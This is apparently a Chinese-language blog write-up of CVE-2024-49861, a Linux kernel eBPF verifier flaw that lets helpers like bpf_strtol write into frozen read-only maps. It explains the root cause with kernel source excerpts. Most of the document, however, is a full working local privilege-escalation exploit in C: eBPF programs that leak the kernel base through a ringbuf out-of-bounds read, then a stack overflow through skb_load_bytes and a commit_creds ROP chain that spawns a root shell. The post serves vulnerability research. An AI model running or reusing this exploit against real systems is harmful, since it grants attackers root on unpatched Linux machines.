CVE-2024-49861

我需要褪黑素

漏洞成因

尽管用户空间和BPF端已将BPF映射冻结为只读,但通过特定helpers仍可向其写入数据,因为这些辅助函数的参数标记为ARG_PTR_TO_{LONG,INT}

proto中的arg_type表示helper对参数的要求以及helper会对参数进行的操作。比如在bpf_strtol的例子中,arg1需为一个指针,helper只对该内存进行读取。

如果需要对内存进行写入,需要额外标记MEM_UNINIT,表明允许传递未初始化内存的指针,因为后续会写入数据。但ARG_PTR_TO_{LONG,INT}本质上是ARG_PTR_TO_FIXED_SIZE_MEM的特例(额外要求对齐),并无MEM_UNINIT的标记。

1
2
3
4
5
6
7
8
9
const struct bpf_func_proto bpf_strtol_proto = {
	.func		= bpf_strtol,
	.gpl_only	= false,
	.ret_type	= RET_INTEGER,
	.arg1_type	= ARG_PTR_TO_MEM | MEM_RDONLY,
	.arg2_type	= ARG_CONST_SIZE,
	.arg3_type	= ARG_ANYTHING,
	.arg4_type	= ARG_PTR_TO_LONG,
};
1
2
3
4
5
6
7
8
9
10
11
12
BPF_CALL_4(bpf_strtol, const char *, buf, size_t, buf_len, u64, flags,
	   s64 *, res)
{
	long long _res;
	int err;

	err = __bpf_strtoll(buf, buf_len, flags, &_res);
	if (err < 0)
		return err;
	*res = _res;
	return err;
}

在check_func_arg中,当参数类型为ARG_PTR_TO_{LONG,INT}时,meta->raw_mode未被设置。随后,在check_helper_mem_access中,若寄存器基类型为PTR_TO_MAP_VALUE,该函数会默认假设操作为BPF_READ(helper只会对内存进行读取)并调用check_map_access_type。BPF映射是只读的,检查会错误地通过。

1
2
3
4
5
6
7
case PTR_TO_MAP_VALUE:
    if (check_map_access_type(env, regno, reg->off, access_size,
                    meta && meta->raw_mode ? BPF_WRITE :
                    BPF_READ)) // meta->raw_mode not set
        return -EACCES;
    return check_map_access(env, regno, reg->off, access_size,
                zero_size_allowed, ACCESS_HELPER);
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
static int check_map_access_type(struct bpf_verifier_env *env, u32 regno,
				 int off, int size, enum bpf_access_type type)
{
	struct bpf_reg_state *regs = cur_regs(env);
	struct bpf_map *map = regs[regno].map_ptr;
	u32 cap = bpf_map_flags_to_cap(map);

	if (type == BPF_WRITE && !(cap & BPF_MAP_CAN_WRITE)) {
		verbose(env, "write into map forbidden, value_size=%d off=%d size=%d\n",
			map->value_size, off, size);
		return -EACCES;
	}

	if (type == BPF_READ && !(cap & BPF_MAP_CAN_READ)) {
		verbose(env, "read from map forbidden, value_size=%d off=%d size=%d\n",
			map->value_size, off, size);
		return -EACCES;
	}

	return 0;
}

利用

主要的利用思路是先写入map一个value,然后freeze这个map。

1
2
3
4
5
6
7
8
exp_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY, 4, 16, 1, BPF_F_RDONLY_PROG);
if (exp_fd < 0) perror("BPF_MAP_CREATE"), err_exit("BPF_MAP_CREATE");

int key = 0;
buffer[0] = 0x10000;
bpf_map_update_elem(exp_fd, &key, buffer);

bpf_map_freeze(exp_fd);

之后通过上述漏洞更改数值。由于map只读默认不会改变,所以在load ebpf程序时会直接使用原始值进行检查,但数值实际上发生了改变,利用数值不一致可以进行越界读写。

Leak

ebpf ringbuf允许在程序中进行内存的申请。先写入0x10000再改成0x100,这样实际申请的大小是0x100,但verifier认为大小为0x10000,这样0~0x10000之间的读写偏移都会通过。

bpf_ringbuf_reserve申请的内存之间的间距是固定的,可以申请两块内存,利用第一块内存越界读写第二块内存的内容,泄露内核基址。

1
2
3
4
5
6
7
|-------------------| high
|     ringbuf_2     |
|-------------------|
|     	hole        |
|-------------------|
|     ringbuf_1     |
|-------------------| low

Exploit

写入8再改成0x200,skb_load_bytes向栈上写数据,这样实际写入大小为0x200但verifier认为是8,造成栈溢出。ROP提权。

Exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
#include "bpf_insn.h"
#include "mykernel.h"


static inline int bpf(int cmd, union bpf_attr *attr)
{
    return syscall(__NR_bpf, cmd, attr, sizeof(*attr));
}

static __always_inline int
bpf_map_create(unsigned int map_type, unsigned int key_size,
               unsigned int value_size, unsigned int max_entries, unsigned int map_flags)
{
        union bpf_attr attr = {
                .map_type = map_type,
                .key_size = key_size,
                .value_size = value_size,
                .max_entries = max_entries,
                .map_flags = map_flags,
        };
        return bpf(BPF_MAP_CREATE, &attr);
}

static __always_inline int
bpf_map_lookup_elem(int map_fd, const void* key, void* value)
{
        union bpf_attr attr = {
                .map_fd = map_fd,
                .key = (uint64_t)key,
                .value = (uint64_t)value,
        };
        return bpf(BPF_MAP_LOOKUP_ELEM, &attr);
}

static __always_inline int
bpf_map_freeze(int map_fd)
{
        union bpf_attr attr = {
                .map_fd = map_fd,
        };
        return bpf(BPF_MAP_FREEZE, &attr);
}

static __always_inline int
bpf_map_update_elem(int map_fd, const void* key, const void* value)
{
        union bpf_attr attr = {
                .map_fd = map_fd,
                .key = (uint64_t)key,
                .value = (uint64_t)value,
        };
        return bpf(BPF_MAP_UPDATE_ELEM, &attr);
}

static __always_inline int
bpf_map_delete_elem(int map_fd, const void* key)
{
        union bpf_attr attr = {
                .map_fd = map_fd,
                .key = (uint64_t)key,
        };
        return bpf(BPF_MAP_DELETE_ELEM, &attr);
}

static __always_inline int
bpf_map_get_next_key(int map_fd, const void* key, void* next_key)
{
        union bpf_attr attr = {
                .map_fd = map_fd,
                .key = (uint64_t)key,
                .next_key = (uint64_t)next_key,
        };
        return bpf(BPF_MAP_GET_NEXT_KEY, &attr);
}

static __always_inline uint32_t
bpf_map_get_info_by_fd(int map_fd)
{
        struct bpf_map_info info;
        union bpf_attr attr = {
                .info.bpf_fd = map_fd,
                .info.info_len = sizeof(info),
                .info.info = (uint64_t)&info,

        };
        bpf(BPF_OBJ_GET_INFO_BY_FD, &attr);
        return info.btf_id;
}

int sockets[2];
int map_fd, exp_fd, ringbuf_map_fd, leak_ringbuf_map_fd;
int leak_map_fd;
int leak_prog_fd, hack_prog_fd;

struct bpf_insn hack_prog[] = {
        BPF_MOV64_REG(BPF_REG_9, BPF_REG_1),    // reg9 = ctx
        BPF_MOV64_IMM(BPF_REG_0, 0),

        // STEP2: rop
        // *(int *)(fp - 4) = 0
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),   // reg2 = fp
        BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),  // reg2 = fp - 4

        BPF_LD_MAP_FD(BPF_REG_1, 4),    // reg1 = exp_fd(4)

        // map_lookup_elem(map_fd(4), fp - 4)
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),

        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
        BPF_EXIT_INSN(),  

        // reg8 = ptr_to_value(8)
        BPF_MOV64_REG(BPF_REG_8, BPF_REG_0),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_8, 8),
        BPF_MOV64_IMM(BPF_REG_0, 0),

        // *(int *)(fp - 4) = 0
        BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4),

        BPF_LD_MAP_FD(BPF_REG_1, 3),    // reg1 = map_fd(3)
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),  // reg2 = fp - 4

        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),

        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
        BPF_EXIT_INSN(),

        // reg7 = ptr_to_value('512')
        BPF_MOV64_REG(BPF_REG_7, BPF_REG_0),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 8),

        BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),
        BPF_MOV64_IMM(BPF_REG_2, 8),
        BPF_MOV64_IMM(BPF_REG_3, 0),
        BPF_MOV64_REG(BPF_REG_4, BPF_REG_8),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_strtol),

        BPF_LD_MAP_FD(BPF_REG_1, 4),
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),  // reg2 = fp - 4

        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),

        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
        BPF_EXIT_INSN(),

        // reg8 = ptr_to_value(0x200)
        // reg7 = value(0x200)
        BPF_MOV64_REG(BPF_REG_8, BPF_REG_0),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_8, 8),
        BPF_MOV64_IMM(BPF_REG_0, 0),

        BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0),

        BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),
        BPF_MOV64_IMM(BPF_REG_2, 0),
        BPF_MOV64_REG(BPF_REG_3, BPF_REG_10),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, -8),
        BPF_MOV64_REG(BPF_REG_4, BPF_REG_7),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_skb_load_bytes),

        BPF_EXIT_INSN(),
};

struct bpf_insn leak_prog[] = {
        BPF_MOV64_REG(BPF_REG_9, BPF_REG_1),    // reg9 = ctx
        BPF_MOV64_IMM(BPF_REG_0, 0),

        // STEP1: leak
        // *(int *)(fp - 4) = 0
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),   // reg2 = fp
        BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),  // reg2 = fp - 4

        BPF_LD_MAP_FD(BPF_REG_1, 4),    // reg1 = exp_fd(4)

        // map_lookup_elem(map_fd(4), fp - 4)
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),

        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
        BPF_EXIT_INSN(),  

        // reg8 = ptr_to_value(0x10000)
        BPF_MOV64_REG(BPF_REG_8, BPF_REG_0),
        BPF_MOV64_IMM(BPF_REG_0, 0),

        // *(int *)(fp - 4) = 0
        BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4),

        BPF_LD_MAP_FD(BPF_REG_1, 3),    // reg1 = map_fd(3)
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),  // reg2 = fp - 4

        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),

        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
        BPF_EXIT_INSN(),

        // reg7 = ptr_to_value('256')
        BPF_MOV64_REG(BPF_REG_7, BPF_REG_0),

        BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),
        BPF_MOV64_IMM(BPF_REG_2, 8),
        BPF_MOV64_IMM(BPF_REG_3, 0),
        BPF_MOV64_REG(BPF_REG_4, BPF_REG_8),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_strtol),

        BPF_LD_MAP_FD(BPF_REG_1, 4),
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),  // reg2 = fp - 4

        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),

        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
        BPF_EXIT_INSN(),

        // reg8 = ptr_to_value(0x100)
        // reg7 = value(0x100)
        BPF_MOV64_REG(BPF_REG_8, BPF_REG_0),
        BPF_MOV64_IMM(BPF_REG_0, 0),

        BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0),

        BPF_LD_MAP_FD(BPF_REG_1, 5),
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_7),
        BPF_MOV64_IMM(BPF_REG_3, 0),

        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_reserve),

        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
        BPF_EXIT_INSN(),

        // reg6 = ptr_to_ringbuf(5)
        BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),

        // reg8 = kernel_base
        BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_6, 0x2ff8+0x28),
        BPF_ALU64_IMM(BPF_SUB, BPF_REG_8, 0x36b440),

        BPF_LD_MAP_FD(BPF_REG_1, 7),
        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -8),
        BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_8, -16),
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),
        BPF_MOV64_REG(BPF_REG_3, BPF_REG_10),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, -16),
        BPF_MOV64_IMM(BPF_REG_4, 0),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_update_elem),

        BPF_MOV64_REG(BPF_REG_1, BPF_REG_6),
        BPF_MOV64_IMM(BPF_REG_2, 0),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_submit),

        BPF_MOV64_IMM(BPF_REG_0, 0),

        BPF_EXIT_INSN(),      
};

#define BPF_LOG_SZ 0x20000
char bpf_log_buf[BPF_LOG_SZ] = { '\0' };

union bpf_attr leak_attr = {
    .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
    .insns = (uint64_t) &leak_prog,
    .insn_cnt = sizeof(leak_prog) / sizeof(leak_prog[0]),
    .license = (uint64_t) "GPL",
    .log_level = 2,
    .log_buf = (uint64_t) bpf_log_buf,
    .log_size = BPF_LOG_SZ,
};

union bpf_attr hack_attr = {
    .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
    .insns = (uint64_t) &hack_prog,
    .insn_cnt = sizeof(hack_prog) / sizeof(hack_prog[0]),
    .license = (uint64_t) "GPL",
    .log_level = 2,
    .log_buf = (uint64_t) bpf_log_buf,
    .log_size = BPF_LOG_SZ,
};


void init() {
        setbuf(stdin, NULL);
        setbuf(stdout, NULL);
        setbuf(stderr, NULL);
        save_status();
        bind_core(0);

        if(!fork()) {
                if(!fork())
                        exit(0);
                exit(0);
        }
        usleep(1000);
}

size_t buffer[0x200/8];


#define MAGIC_LEAK      0x114514
#define MAGIC_HACK      0x233333


void trigger(int fd_tmp) {
        struct __sk_buff md = {};

        union bpf_attr test_run_attr = {
                .test.prog_fd = fd_tmp,
                .test.data_size_in = 0x300,
                .test.data_in = (uint64_t)&buffer,
                .test.ctx_size_in = sizeof(md),
                .test.ctx_in = (uint64_t)&md,
        };

        bpf(BPF_PROG_TEST_RUN, &test_run_attr);
}

void leak() {

        prctl(PR_SET_NAME, "Eurus");

        map_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY, 4, 16, 1, BPF_F_RDONLY_PROG);
        if (map_fd < 0) perror("BPF_MAP_CREATE"), err_exit("BPF_MAP_CREATE");

        exp_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY, 4, 16, 1, BPF_F_RDONLY_PROG);
        if (exp_fd < 0) perror("BPF_MAP_CREATE"), err_exit("BPF_MAP_CREATE");

        int key = 0;
        buffer[0] = 0x10000;
        buffer[1] = 8;
        bpf_map_update_elem(exp_fd, &key, buffer);

        buffer[0] = 0x363532;
        buffer[1] = 0x323135;
        bpf_map_update_elem(map_fd, &key, buffer);

        bpf_map_freeze(exp_fd);
        bpf_map_freeze(map_fd);

        ringbuf_map_fd = bpf_map_create(BPF_MAP_TYPE_RINGBUF, 0, 0, 0x1000, 0);
        if (ringbuf_map_fd < 0) perror("BPF_MAP_CREATE"), err_exit("BPF_MAP_CREATE");

        leak_ringbuf_map_fd = bpf_map_create(BPF_MAP_TYPE_RINGBUF, 0, 0, 0x1000, 0);
        if (leak_ringbuf_map_fd < 0) perror("BPF_MAP_CREATE"), err_exit("BPF_MAP_CREATE");

        leak_map_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY, 4, 8, 1, 0);
        if (leak_map_fd < 0) perror("BPF_MAP_CREATE"), err_exit("BPF_MAP_CREATE");

        printf("map_fd: %d\n", map_fd);
        printf("exp_fd: %d\n", exp_fd);
        printf("ringbuf_map_fd: %d\n", ringbuf_map_fd);
        printf("leak_ringbuf_map_fd: %d\n", leak_ringbuf_map_fd);
        printf("leak_map_fd: %d\n", leak_map_fd);

        leak_prog_fd = bpf(BPF_PROG_LOAD, &leak_attr);
        if (leak_prog_fd < 0) puts(bpf_log_buf), perror("BPF_PROG_LOAD"), err_exit("BPF_PROG_LOAD");

        printf("leak_prog_fd: %d\n", leak_prog_fd);

        //puts(bpf_log_buf);
}

size_t kernel_base;

#define POP_RDI_RET             0xe6d00
#define INIT_CRED               0x248b080
#define COMMIT_CREDS            0x146b70
#define POP_RCX_RET             0x1dc1a3
#define RETURN_USER_MODE        0x1400163
#define VFORK                   0x104150

void hack(){
        hack_prog_fd = bpf(BPF_PROG_LOAD, &hack_attr);
        if (hack_prog_fd < 0) puts(bpf_log_buf), perror("BPF_PROG_LOAD"), err_exit("BPF_PROG_LOAD");

        printf("hack_prog_fd: %d\n", hack_prog_fd);

        //puts(bpf_log_buf);

        int i = 0;
        size_t *p = (size_t *)((size_t)buffer + 14);
        p[i++] = 0xdeadbeef;
        p[i++] = 0xdeadbeef;
        p[i++] = POP_RDI_RET+kernel_base;
        p[i++] = INIT_CRED+kernel_base;
        p[i++] = COMMIT_CREDS+kernel_base;
        p[i++] = POP_RCX_RET+kernel_base;
        p[i++] = (size_t)&get_root_shell;
        p[i++] = VFORK+kernel_base;       
}

int main(int argc, char** argv, char** envp)
{
        init();
        leak();
        trigger(leak_prog_fd);
        unsigned int key = 0;
        bpf_map_lookup_elem(leak_map_fd, &key, &kernel_base);
        printf("kernel_base: %lx\n", kernel_base);

        hack();
        trigger(hack_prog_fd);

        if(!getuid())   get_root_shell();
        else            puts("Oops...");

        while(1){}

        return 0;
}
CVEs > Linux Kernel
#kernel #cve #ebpf
CVE-2024-49861
http://akaieurus.github.io/2025/08/05/cve-2024-49861/
作者
Eurus
发布于
2025年8月5日
许可协议